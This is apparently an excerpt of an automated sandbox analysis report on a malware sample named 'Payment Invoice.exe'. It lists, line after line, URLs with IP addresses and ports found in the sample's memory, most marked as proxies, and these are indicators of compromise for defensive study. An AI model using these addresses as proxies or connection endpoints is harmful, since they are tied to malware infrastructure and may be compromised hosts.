                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.26.108.118:84://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.28.121.58://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.28.121.58:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.28.121.58:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.31.84.122:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.31.84.122:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.35.108.145:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.35.108.145:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.35.110.94:5020
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.35.110.94:5020://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.35.189.217:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.35.189.217:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.35.190.18:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.35.190.18:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.36.35.135:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.4.94.2:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.4.94.2:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.42.228.62:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.42.228.62:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.42.28.27:45787
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.42.28.27:45787://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.42.57.13:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.42.57.13:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.175.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.175.161:83
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.175.161:83://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.93.194:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.93.194:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.93.210:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.93.210:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.93.216:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.93.216:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.93.219:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.93.219:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.93.225:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.93.225:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317272000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.93.231:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163172B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.93.231:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.93.236:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.93.236:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.93.242:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631999B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.93.242:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631964E000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163198FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.93.252:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.47.93.252:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.48.68.101:83
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.48.68.101:83://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.48.69.113:82
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.48.69.113:82://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.48.69.113:83
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.48.69.113:83://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.49.114.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.49.114.195:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.49.114.195:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.49.202.252
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.49.202.252://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.49.202.252:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.49.28.23:12113
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.49.28.23:12113://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.53.110.45:10801
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.53.110.45:10801://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.53.78.26:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.53.78.26:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.58.16.57:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.58.16.57:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.59.190.209:56252
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.59.190.209:56252://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.59.203.249:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.59.203.249:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.6.177.174:8002
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.6.177.174:8002://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.60.161.18:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.60.161.18:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.60.180.165:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.60.180.165:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.60.186.21:52195
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.60.186.21:52195://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.66.232.169:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.66.232.169:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.66.233.137:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.66.233.137:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.66.233.161:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.66.233.161:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.66.233.225:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.66.233.225:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.69.151.189:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.69.151.189:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.69.87.142:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.69.87.142:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.69.90.57:8081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.69.90.57:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.70.206.129:59311://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163183A2000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318370000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.72.89.133:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163183A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.72.89.133:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.74.229.133:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.74.229.133:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.75.96.7
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.75.96.70:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.75.96.70:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.76.129.110:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.76.129.110:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.76.148.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.76.148.161:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.76.148.161:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.76.253.66:3129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.76.253.66:3129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163171D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.77.50.168:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163171E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.77.50.168:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.170.13:83
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.170.13:83://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.201.242:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.201.242:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.96.146:8181
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.96.146:8181://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.8.164.16:1111
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.8.164.16:1111://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.80.224.33:83
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.80.224.33:83://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.81.115.210:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.81.115.210:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.81.13.201:44832
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.81.13.201:44832://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.81.194.173:3125
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.81.194.173:3125://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.81.220.33:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.81.220.33:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.82.157.102:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316E50000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.82.8.189:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.82.8.189:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.83.105.167:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.83.105.167:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.83.178.205:2016
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.83.178.205:2016://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.83.80.67:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.83.80.67:8080://proxyP
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.177.27:8083
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.177.27:8083://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.177.28:8083
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.177.28:8083://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.178.2:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.178.2:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.235.162:8789
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.235.162:8789://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.86.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.86.1.2:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.86.1.2:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.86.1.9:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.86.1.9:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.90.227.244:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.90.227.244:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.90.227.244:3128N
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.94.133.92:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.94.133.92:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.95.97.42:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.95.97.42:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.96.38.161
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.96.38.161://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.96.38.161:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.97.179.115:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.97.179.115:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.128.103.32:64312
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.128.103.32:64312://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.129.206.65:8800
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.131.77.66:2233
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.131.77.66:2233://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.104.12
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.104.12://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.104.12:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.106
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.106://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.106:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.142
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.142://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.142:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.146
